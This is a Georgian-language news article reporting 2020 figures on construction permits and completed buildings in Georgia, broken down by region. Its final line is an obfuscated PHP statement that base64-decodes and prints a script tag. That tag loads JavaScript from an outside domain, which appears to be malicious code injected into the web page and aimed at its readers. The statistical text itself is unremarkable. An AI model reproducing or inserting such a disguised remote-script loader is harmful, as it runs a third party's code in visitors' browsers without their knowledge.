celsiusi
ავერსი საქკაბელი
2020 წელს მშენებლობაზე გაცემული ნებართვები 11%-ით, ექსპლუატაციაში მიღებული შენობების რიცხვი კი 33,5%-ით შემცირდა.
 
ოფიციალური დეკლარირებული მონაცემებით, საქართველოში 2020 წელს გაცემულია 9 564 ნებართვა (წინა წელთან შედარებით 11,0 პროცენტით ნაკლები) 5 206,3 ათასი კვ.მ ფართობის შენობა-ნაგებობების მშენებლობაზე (წინა წელთან შედარებით 30,9 პროცენტით ნაკლები).
 
საქსტატის მონაცემებით, ნებართვების 77,0 პროცენტი მოდის ქვეყნის 4 რეგიონზე. კერძოდ, ჩასატარებელი სამშენებლო სამუშაოების 53,5 პროცენტი თბილისზე, 9,6 პროცენტი - ქვემო ქართლის რეგიონზე, 7,0 პროცენტი - მცხეთა-მთიანეთის რეგიონზე და 6,9 პროცენტი - იმერეთის რეგიონზე.
 
აღსანიშნავია, რომ 2020 წელს ნებართვები გაიცა მრავალფუნქციური საცხოვრებელი კომპლექსების, სავაჭრო ობიექტების, სასტუმროების, სამრეწველო საწარმოების, სასოფლო სამეურნეო დანიშნულების ობიექტებისა და სხვა შენობა-ნაგებობების მშენებლობაზე. გაცემულ ნებართვებში შედარებით დიდი წილით წარმოდგენილია მრავალფუნქციური საცხოვრებელი კომპლექსები.
 
დამთავრებული მშენებლობების ნახევარზე მეტი მოდის ქვეყნის 4 რეგიონზე. კერძოდ, 27,8 პროცენტი ქ. თბილისზე, 14,6 პროცენტი - კახეთის რეგიონზე, 10,1 პროცენტი - ქვემო ქართლის რეგიონზე, ხოლო 9,5 პროცენტი - იმერეთის რეგიონზე.
 
სულ, 2020 წელს ექსპლუატაციაში მიღებულ იქნა 1 694,3 ათასი კვ.მ ფართობის (წინა წელთან შედარებით 33,5 პროცენტით ნაკლები) 2 134 ობიექტი (წინა წელთან შედარებით 14,9 პროცენტით ნაკლები).
1479
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");